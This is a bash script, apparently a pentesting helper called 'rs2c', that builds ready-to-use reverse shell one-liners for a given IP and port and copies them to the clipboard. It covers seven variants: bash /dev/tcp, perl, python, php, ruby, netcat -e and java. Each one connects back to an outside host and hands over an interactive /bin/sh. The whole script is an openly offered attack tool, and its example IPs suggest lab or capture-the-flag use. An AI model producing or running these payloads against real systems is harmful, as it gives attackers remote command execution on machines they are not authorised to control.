#!/bin/bash

# Reverse Shell to Clipboard
# Author: bitc0de
# Github: https://github.com/bitc0de

vars=(bash perl python php ruby nc java)

process () {
    if [ "$1" = "-h" ] || [ "$1" = "-help" ] || [ "$1" = "help" ]
    then
        echo "-------------------------------------------------"
        echo -e "\n\n[++Reverse Shell to Clipboard++]"
        echo -e "[++++++++Author: bitc0de+++++++]\n"
        echo "[!] Versions you can use:"
        echo -e "bash perl python php ruby nc java\n"
        echo -e "Example: rs2c.sh python 10.10.11.239 4444\n\n"
        echo "-------------------------------------------------"
        exit 1
    fi
    if [[ $2 =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]
        then
            if [ $3 -lt 65535 ] && [ $3 -gt 0 ]
            then
                if [[ ${vars[*]} =~ "$1" ]]
                then
                   if [ "$1" = "bash" ]
                   then
                       echo "bash -i >& /dev/tcp/$2/$3 0>&1" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   elif [ "$1" = "perl" ]
                   then
                       echo "perl -e 'use Socket;\$i=\"$2\";\$p=$3;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   elif [ "$1" = "python" ]
                   then
                       echo "python -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('$2',$3));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);\"" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   elif [ "$1" = "php" ]
                   then
                       echo "php -r '$sock=fsockopen(\"$2\",$3);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   elif [ "$1" = "ruby" ]
                   then
                       echo "ruby -rsocket -e'f=TCPSocket.open(\"$2\",$3).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   elif [ "$1" = "nc" ]
                   then
                       echo "nc -e /bin/sh $2 $3" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   elif [ "$1" = "java" ]
                   then
                       echo "r = Runtime.getRuntime() p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/$2/$3;cat <&5 | while read line; do \$line 2>&5 >&5; done\"] as String[]) p.waitFor()" | xclip -selection clipboard
                       echo "[*] Reverse shell copied to clipboard"
                   fi
                else
                    echo "[!] Command $1 not accepted"
                fi
            else
                echo "[!] Use a correct port -> Ex: sudo rs2c 10.10.11.139 4444"
            fi
        else
            echo "[!] Use a correct IP -> Ex: sudo rs2c 10.10.11.139 4444"
        fi

}

check_xclip () {
    if command -v xclip &> /dev/null
    then
        process $1 $2 $3
    else 
        echo "[!] xclip not installed, do you want install it? y/n"
        read instxclip
        if [ "$instxclip" = "y" ]
        then
             check_perm $1 $2 $3
        elif [ "$instxclip" = "n" ]
        then
            echo "[!] xclip not installed, exiting..."
        fi
    fi
}

check_perm () {
    if [ "$EUID" -ne 0 ]
    then
        echo "[!] You don't have permissions, use sudo"
    else
        apt-get install xclip -y; clear; echo "[*] xclip installed! Processing reverse shell cheat sheet!"; bash ./rs2c.sh $1 $2 $3
    fi
}

check_xclip $1 $2 $3


